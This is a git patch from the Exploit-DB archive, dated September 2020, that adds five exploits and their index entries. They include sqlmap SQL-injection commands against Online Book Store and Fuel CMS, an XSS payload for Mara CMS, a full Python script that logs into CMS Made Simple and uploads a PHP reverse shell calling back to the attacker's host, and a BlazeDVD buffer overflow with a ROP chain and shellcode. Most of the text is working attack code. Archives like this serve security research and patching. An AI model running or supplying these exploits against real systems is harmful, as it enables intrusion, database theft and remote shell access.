From d6bcc3b093410ca70b194b4e9b00cdac88ad212b Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 1 Sep 2020 05:02:09 +0000
Subject: [PATCH] DB: 2020-09-01

5 changes to exploits/shellcodes

BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH_ASLR_DEP)
Online Book Store 1.0 - 'id' SQL Injection
Mara CMS  7.5 - Reflective Cross-Site Scripting
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated)
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)
---
 exploits/php/webapps/48775.txt  |  12 ++++
 exploits/php/webapps/48777.txt  |  30 +++++++++
 exploits/php/webapps/48778.txt  |  69 +++++++++++++++++++
 exploits/php/webapps/48779.py   |  63 +++++++++++++++++
 exploits/windows/local/48776.py | 116 ++++++++++++++++++++++++++++++++
 files_exploits.csv              |   5 ++
 6 files changed, 295 insertions(+)
 create mode 100644 exploits/php/webapps/48775.txt
 create mode 100644 exploits/php/webapps/48777.txt
 create mode 100644 exploits/php/webapps/48778.txt
 create mode 100755 exploits/php/webapps/48779.py
 create mode 100755 exploits/windows/local/48776.py

diff --git a/exploits/php/webapps/48775.txt b/exploits/php/webapps/48775.txt
new file mode 100644
index 000000000..928cb576f
--- /dev/null
+++ b/exploits/php/webapps/48775.txt
@@ -0,0 +1,12 @@
+# Title: Online Book Store 1.0 - 'id' SQL Injection
+# Exploit Author: Moaaz Taha (0xStorm)
+# Date: 2020-08-21
+# Vendor Homepage: https://www.sourcecodester.com/php/14383/online-book-store.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14383&title=Online+Book+Store
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
+# Description
+This parameter "id" is vulnerable to Union-Based blind SQL injection in this path "/online%20book%20store/detail.php?id=44" that leads to retrieve all databases.
+
+#POC
+sqlmap -u "http://TARGET/online%20book%20store/detail.php?id=44" -p id --dbms=mysql --threads=10 --technique=U --dbs
\ No newline at end of file
diff --git a/exploits/php/webapps/48777.txt b/exploits/php/webapps/48777.txt
new file mode 100644
index 000000000..df3b8bece
--- /dev/null
+++ b/exploits/php/webapps/48777.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Mara CMS  7.5 - Reflective Cross-Site Scripting
+# Google Dork: NA
+# Date: 2020-08-01
+# Exploit Author: George Tsimpidas
+# Vendor Homepage: https://sourceforge.net/projects/maracms/
+# Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
+# Version: 7.5
+# Tested on: Kali Linux(x64)
+# CVE : CVE-2020-24223
+
+
+Mara CMS 7.5 suffers from a Reflected Cross Site Scripting vulnerability.
+
+Description :
+
+
+ This Reflected XSS vulnerability allows any authenticated user to
+inject malicious code via the parameter contact.php?theme=<inject>.
+The vulnerability exists because the parameter is not properly
+sanitized and this can lead to malicious code injection that will be
+executed on the target’s browser.
+
+PoC :
+
+Use Payload : seven69387';alert(1)//154
+
+Path : http://localhost/contact.php?theme=< inject payload here>
+
+Injection Example :
+http://localhost/contact.php?theme=seven69387';alert(1)//154
\ No newline at end of file
diff --git a/exploits/php/webapps/48778.txt b/exploits/php/webapps/48778.txt
new file mode 100644
index 000000000..67925e1e8
--- /dev/null
+++ b/exploits/php/webapps/48778.txt
@@ -0,0 +1,69 @@
+# Exploit Title: Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated)
+# Date: 2020-08-19
+# Exploit Author: c0mpu7er（@ymbank.cn）
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.8.zip
+# Version: 1.4.7
+# Tested on: PHP 5.4.45, Apache 2.4.23 ,mysql 5.0
+
+
+1. Description:
+----------------------
+
+FUEL CMS 1.4.8 allows SQL Injection via parameter 'fuel_replace_id' in pages/replace/1
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+
+2. Proof of Concept:
+----------------------
+
+In Burpsuite intercept the request from one of the affected pages with 'fuel_replace_id' parameter and save it like 33.txt
+Then run SQLmap to extract the data from the database:
+
+python sqlmap.py -r 33.txt --dbs
+
+3.Example payload:
+
+Content-Disposition: form-data; name="fuel_replace_id"
+
+11%27
+
+
+
+4. Burpsuite request payload:
+----------------------
+
+POST /FUEL-CMS-1.4.8/fuel/pages/replace/1?inline=1 HTTP/1.1
+Host: 192.168.1.12
+Content-Length: 347
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.1.12
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygI1zKZoBINTcL87g
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.1.12/FUEL-CMS-1.4.8/fuel/pages/replace/1?lang=english
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Cookie: fuel_ac82b68172fd46789948eb8e66216180=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A0%3A%22%22%3B%7D; fuel_ui_ac82b68172fd46789948eb8e66216180=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%252C%2522tabs_pages_create%2522%253A%25220%2522%252C%2522fuel_navigation_items%2522%253A%2522list%2522%252C%2522tabs_navigation_create%2522%253A%25220%2522%252C%2522tabs_pages_edit_1%2522%253A%25220%2522%257D; ci_session=db8df72tccrt8vnr2uaqnckv5ak4n135
+Connection: close
+
+------WebKitFormBoundarygI1zKZoBINTcL87g
+Content-Disposition: form-data; name="fuel_replace_id"
+
+11*
+------WebKitFormBoundarygI1zKZoBINTcL87g
+Content-Disposition: form-data; name="Submit"
+
+Submit
+------WebKitFormBoundarygI1zKZoBINTcL87g
+Content-Disposition: form-data; name="fuel_inline"
+
+1
+------WebKitFormBoundarygI1zKZoBINTcL87g--
+5. Timeline:
+----------------------
+
+2020-08-20: SQLi vulnerability found in Fuel CMS 1.4.8
+2020-08-20: Reported vulnerability to vendor
+2020-08-22: Vendor has patched the SQLi vulnerability in version 1.4.9
\ No newline at end of file
diff --git a/exploits/php/webapps/48779.py b/exploits/php/webapps/48779.py
new file mode 100755
index 000000000..8882c18cb
--- /dev/null
+++ b/exploits/php/webapps/48779.py
@@ -0,0 +1,63 @@
+#!/usr/bin/python3
+#-*- coding: utf-8 -*-
+
+# Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)
+# Google Dork: N/A
+# Date: 2020-08-31
+# Exploit Author: Luis Noriega (@nogagmx)
+# Vendor Homepage: https://www.cmsmadesimple.org/
+# Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
+# Version: 2.2.14
+# Tested on: Linux Ubuntu 18.04.4 LTS
+# CVE : N/A
+
+# Usage:
+# python3 exploit.py --url http://URL/cmsms/admin/login.php -u admin -p password -lhost LHOST -lport LPORT
+
+from urllib.parse import urlparse
+import requests
+import argparse
+import string
+import random
+import json
+import sys
+
+def parse_url(URL):
+	t = urlparse(URL)
+	return t.scheme+'://'+t.netloc+t.path.split('login.php')[0] + 'moduleinterface.php'
+
+
+parser = argparse.ArgumentParser(description='CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload - PHP Reverse Shell')
+parser.add_argument('--url', dest='URL', help='URL to admin pane </admin/login.php>', required=True)
+parser.add_argument('-u', dest='USERNAME', help='Username', required=True)
+parser.add_argument('-p', dest='PASSWORD', help='Password', required=True)
+parser.add_argument('-lhost', dest='IP', help='The listen address', required=True)
+parser.add_argument('-lport', dest='PORT', help='The listen port', required=True)
+
+args = parser.parse_args()
+login_data = {'username':"", "password":"", "loginsubmit": "Submit"}
+PAYLOAD = '<?php set_time_limit (0); $VERSION = "1.0"; $ip = "%s"; $port = "%s"; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/bash -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { printit("ERROR: Cannot fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("Error: Cannot setsid()"); exit(1); } $daemon = 1; } else { printit("WARNING: Failed to daemonise.  This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Cannot spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) {  if (!$daemon) { print "$string\n"; } } ?>'% (args.IP,args.PORT)
+FILENAME = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(5)) + '.phar'
+file = {'m1_files[]': (FILENAME, PAYLOAD)}
+upload_data = {"mact":"FileManager,m1_,upload,0", "__c":"", "disable_buffer":"1"}
+URL_UPLOAD = parse_url(args.URL)
+
+print("[ + ] Connection to the CMS Made Simple Admin Portal located at "+ args.URL)
+print("[ + ] Using "+ args.USERNAME +":"+ args.PASSWORD); login_data['username'] = args.USERNAME; login_data['password'] = args.PASSWORD
+
+try:
+	session = requests.session()
+	req = session.post(args.URL, data=login_data)
+	upload_data["__c"] = session.cookies["__c"]
+	print ("[ + ] %s logged successfully!"%(args.USERNAME))
+	response = requests.post(URL_UPLOAD, files=file, cookies=session.cookies,data=upload_data)
+	data = response.json()
+	print ("[ + ] %s file uploaded."%(FILENAME))
+	URL_TRIGGER = data[0]['url']
+	input("[ ! ] Set up your nc listener <nc -nvlp %s>, then press any to exploit.."%(args.PORT))
+	print ("[ + ] Pwned!!")
+	response = requests.get(URL_TRIGGER, cookies=session.cookies)
+	print ("[ + ] Bye")
+except:
+	print ("[ x ] Something went wrong, try again.")
+	sys.exit(1)
\ No newline at end of file
diff --git a/exploits/windows/local/48776.py b/exploits/windows/local/48776.py
new file mode 100755
index 000000000..1fefe532e
--- /dev/null
+++ b/exploits/windows/local/48776.py
@@ -0,0 +1,116 @@
+## Title: BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH,ASLR,DEP)
+## Author: emalp
+## Date: 2020-08-31
+## Vendor Homepage: http://www.blazevideo.com/
+## Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
+## Version: 7.0.0.0
+## Tested on: Windows 7 Home Basic
+
+# Run this file
+# bfile.plf will be generated
+# In blazeDVD open playlist and select bfile.plf
+# a pop up box will appear with text 'emalp'
+
+## Change shellcode according to your needs
+## Shellcode max size is aroung 700 bytes.
+
+# bad chars:
+# \x00, \x0a, \x0b, \x1a
+
+import struct
+
+bfile = open('bfile.plf','w')
+
+buf = 'A'*84
+buf += struct.pack('<L', 0x60325143) # add esp, 0c; ret
+buf += 'AAAA' # ret 04 ting from sehandler
+buf += 'AAAA'*3 # bypassing 12 bytes i.e 0c
+buf += struct.pack('<L', 0x6402091b) # add esp, 200; ret
+buf += 'A'*500
+buf += 'BBBB' # nseh
+buf += struct.pack('<L', 0x640205b1) #sehandler; add esp, 4a0; ret 0x04
+
+#---------------------------------------------------------------------
+# this way we have a lot more space for shellcode.
+buf += 'AAAA'
+# esp lands here.
+#setting up the dynamic pointer for virtual protect
+buf += struct.pack('<L', 0x61640e32) # pop eax; retn.
+buf += struct.pack('<L', 0xffed06a4) # opp of 0012f95c; contains pointer to k32
+buf += struct.pack('<L', 0x603267d4) # neg eax, now eax contains 0012f95c
+buf += struct.pack('<L', 0x616306ed) # mov eax, dword ptr ds:[eax]
+# now eax has the kernel32.dll pointer
+buf += struct.pack('<L', 0x61640f09) # push eax, pop esi, ret 04
+buf += struct.pack('<L', 0x61640e32) # pop eax ret
+buf += 'XXXX' # ret 4 padding
+buf += struct.pack('<L', 0xffff675d) #  neg to 98a3
+buf += struct.pack('<L', 0x603267d4) # neg eax; ret
+# right now eax = 98a3; esi = [0012f95c] = k32.dll val
+buf += struct.pack('<L', 0x6033dcc4) # xchg eax,ecx; xor al,60; ret 
+buf += struct.pack('<L', 0x61644904) # mov eax,esi; pop esi; ret
+buf += 'XXXX' # pop esi padding
+buf += struct.pack('<L', 0x641045f4) # sub eax,ecx
+# now eax has the pointer to VirtualProtect
+#------------------------------------------------------------------------
+
+# SETTING THE REGISTERS FOR VIRTUALPROTECT PARAM
+# SETTING ESI
+buf += struct.pack('<L', 0x61640f09) # push eax, pop esi; ret 4
+# SETTING EBP
+buf += struct.pack('<L', 0x60327f8f) # pop ebp; ret
+buf += 'XXXX' # prev ret 4 padding
+buf += struct.pack('<L', 0x60349b63) # jmp esp
+# SETTING EBX
+buf += struct.pack('<L', 0x61629938) # pop eax; ret
+buf += struct.pack('<L', 0xfffffdff) # neg to 0x201
+buf += struct.pack('<L', 0x6033b16b) # neg eax; ret
+buf += struct.pack('<L', 0x61640124) # xchg eax,ebx
+# SETTING EDX
+buf += struct.pack('<L', 0x616310e8) # pop eax; ret
+buf += struct.pack('<L', 0xffffffc0) # neg of 0x40
+buf += struct.pack('<L', 0x6033b16b) # neg eax; retn
+buf += struct.pack('<L', 0x61608ba2) # xchg eax,edx
+# SETTING ECX
+buf += struct.pack('<L', 0x6404fbb9) # pop ecx; ret
+buf += struct.pack('<L', 0x1001524e) # writable location
+# SETTING EDI
+buf += struct.pack('<L', 0x6032b0b8) # pop edi; ret
+buf += struct.pack('<L', 0x6162e802) # retn (rop nop)
+# SETTING EAX
+buf += struct.pack('<L', 0x6162d638) # pop eax; retn
+buf += struct.pack('<L', 0x90909090) # nop
+# FINALLY PUSHAD
+buf += struct.pack('<L', 0x6033cd4a) # push ad
+
+buf += '\x90\x90\x90\x90'*4
+
+# shellcode generated using:
+# msfvenom -a x86 --platform windows -p windows/messagebox TEXT="emalp"
+#       -b '\x00\x0a\x0b\x1a'
+buf += (
+"\xbb\x42\xa8\xb5\x43\xda\xc7\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
+"\x41\x83\xc2\x04\x31\x5a\x0f\x03\x5a\x4d\x4a\x40\x9a\xba\x11"
+"\x72\x69\x18\xd2\xb4\x40\xd2\x6d\x86\xad\x76\x19\x99\x1d\xfd"
+"\x6b\x56\xd5\x77\x88\xed\xaf\x7f\x3b\x8f\x0f\xf4\x0d\x48\x1f"
+"\x12\x07\x5b\xc6\x23\x36\x64\x18\x43\x33\xf7\xff\xa7\xc8\x4d"
+"\x3c\x2c\x9a\x65\x44\x33\xc9\xfd\xfe\x2b\x86\x58\xdf\x4a\x73"
+"\xbf\x2b\x05\x08\x74\xdf\x94\xe0\x44\x20\xa7\x3c\x5a\x72\x43"
+"\x7c\xd7\x8c\x8a\xb2\x15\x92\xcb\xa6\xd2\xaf\xaf\x1c\x33\xa5"
+"\xae\xd6\x19\x61\x31\x02\xfb\xe2\x3d\x9f\x8f\xaf\x21\x1e\x7b"
+"\xc4\x5d\xab\x7a\x33\xd4\xef\x58\xdf\x87\x2c\x12\xd7\x6e\x67"
+"\xda\x0d\xf9\x45\xb5\x43\xb7\x47\xaa\x0e\xaf\xc7\xcd\x50\xd0"
+"\x71\x74\xab\x95\xfc\xaf\x51\x9a\x87\x4c\xb2\x0e\x60\xe2\x45"
+"\x51\x8f\x72\xfc\xa5\x18\xe9\x93\x95\x99\x99\x58\xe7\x37\x3e"
+"\xf7\x72\x3b\xdb\x75\x4c\x60\xab\x26\x88\x9c\x25\x30\x86\x5f"
+"\x60\xb9\xaf\x62\xdb\x7a\x07\xc0\x91\xc0\xd0\x19\x0e\x6b\x36"
+"\x7e\xb1\x74\x39\xe9\x22\xf3\x9d\xca\xd4\x62\x7a\x6e\x67\x0d"
+"\xc9\x15\x14\xbe\xe0\x0e\x52\x1c\x26\xbb\xea\x7e\x4e\xcb\xb4"
+"\xa0\xae\x43\x20\xcc\xcf\xff\x9b\xc7\x87\x4c\xf8\xd2\x1e\xad"
+"\x31\x0f\x72\x7d\x63\xfd\x8d\x51\xb2\xc1\x21\xad\xe0\xc9"
+    )
+buf += '\x90\x90\x90\x90'*5
+
+buf += 'E'*200
+
+bfile.write(buf)
+bfile.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 4a884ee99..695501f3e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11140,6 +11140,7 @@ id,file,description,date,author,type,platform,port
 48735,exploits/windows/local/48735.txt,"CodeMeter 6.60 - 'CodeMeter.exe' Unquoted Service Path",2020-08-06,"Luis Martínez",local,windows,
 48740,exploits/windows/local/48740.txt,"BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path",2020-08-10,"Daniel Bertoni",local,windows,
 48769,exploits/windows/local/48769.py,"ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)",2020-08-27,"Paras Bhatia",local,windows,
+48776,exploits/windows/local/48776.py,"BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH_ASLR_DEP)",2020-08-31,emalp,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43013,3 +43014,7 @@ id,file,description,date,author,type,platform,port
 48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,
 48773,exploits/php/webapps/48773.txt,"SymphonyCMS 3.0.0 - Persistent Cross-Site Scripting",2020-08-28,SunCSR,webapps,php,
 48774,exploits/hardware/webapps/48774.py,"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation",2020-08-28,LiquidWorm,webapps,hardware,
+48775,exploits/php/webapps/48775.txt,"Online Book Store 1.0 - 'id' SQL Injection",2020-08-31,"Moaaz Taha",webapps,php,
+48777,exploits/php/webapps/48777.txt,"Mara CMS  7.5 - Reflective Cross-Site Scripting",2020-08-31,"George Tsimpidas",webapps,php,
+48778,exploits/php/webapps/48778.txt,"Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated)",2020-08-31,c0mpu7er,webapps,php,
+48779,exploits/php/webapps/48779.py,"CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)",2020-08-31,"Luis Noriega",webapps,php,